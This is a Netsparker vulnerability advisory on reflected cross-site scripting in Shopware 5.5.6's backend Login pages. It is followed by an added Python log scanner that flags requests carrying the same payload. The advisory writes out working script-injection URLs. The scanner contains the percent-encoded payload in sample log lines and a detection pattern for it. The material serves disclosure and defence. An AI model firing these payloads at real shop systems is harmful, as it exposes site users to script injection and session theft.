*Information:*  
Advisory by Netsparker  
Name: Multiple Cross-site Scripting Vulnerabilities in Shopware  
Affected Software: Shopware  
Affected Versions: 5.5.6  
Homepage: https://en.shopware.com/  
Vulnerability: Cross-site Scripting  
Severity: High  
Status: Fixed  
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-004  
  
  
*Technical Details:*  
URL : http://{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
Parameter Type : Query String  
Parameter Name : Query Based  
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-SHOPWARE}/backend/Login/load/?'"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
Parameter Type : Query String  
Parameter Name : Query Based  
Attack Pattern : '"--></style></scRipt><scRipt>alert(“test”)</scRipt>  
  
Regards,  
  
Daniel Bishtawi
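
Added example, not part of the Netsparker advisory or Shopware's code: a log check that flags requests to the two backend Login URLs above whose query string, once percent-decoded, contains the markup-breaking tokens from the reported attack pattern. The combined log format, the `/shop` install prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoints named in the advisory; any install prefix may precede them.
# Matched case-insensitively to stay conservative.
ENDPOINT = re.compile(r"/backend/Login(?:/load)?/?$", re.IGNORECASE)
# Markup-breaking tokens from the advisory's attack pattern. Matching is
# case-insensitive because the pattern mixes case ("scRipt").
TOKENS = re.compile(r"</?\s*script|</\s*style|-->", re.IGNORECASE)
# Request line of a combined-log-format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# The advisory's attack pattern, percent-encoded as it would appear in a log.
ENC = ("%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3E"
       "alert(%E2%80%9Ctest%E2%80%9D)%3C%2FscRipt%3E")
# Constructed sample log lines (documentation IP range, made-up prefix).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2019:10:00:00 +0000] "GET /shop/backend/Login?_dc=1546336800 HTTP/1.1" 200 512',
    f'203.0.113.9 - - [01/Jan/2019:10:00:05 +0000] "GET /shop/backend/Login?{ENC} HTTP/1.1" 200 734',
    f'203.0.113.9 - - [01/Jan/2019:10:00:06 +0000] "GET /shop/backend/Login/load/?{ENC} HTTP/1.1" 200 9120',
    '203.0.113.7 - - [01/Jan/2019:10:00:09 +0000] "GET /shop/search?sSearch=shoes HTTP/1.1" 200 4096',
]

def decode_fully(value, rounds=3):
    """Percent-decode until stable so nested encoding is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious(line):
    """True if the line is a request to an affected endpoint with markup in the query."""
    match = REQUEST.search(line)
    if not match:
        return False
    path, _, query = match.group(1).partition("?")
    if not ENDPOINT.search(path):
        return False
    return bool(TOKENS.search(decode_fully(query)))

def scan(lines):
    """Return the 1-based numbers of the log lines that should be reviewed."""
    return [n for n, line in enumerate(lines, 1) if suspicious(line)]

if __name__ == "__main__":
    for n in scan(SAMPLE_LOG):
        print(f"line {n}: {SAMPLE_LOG[n - 1]}")
```
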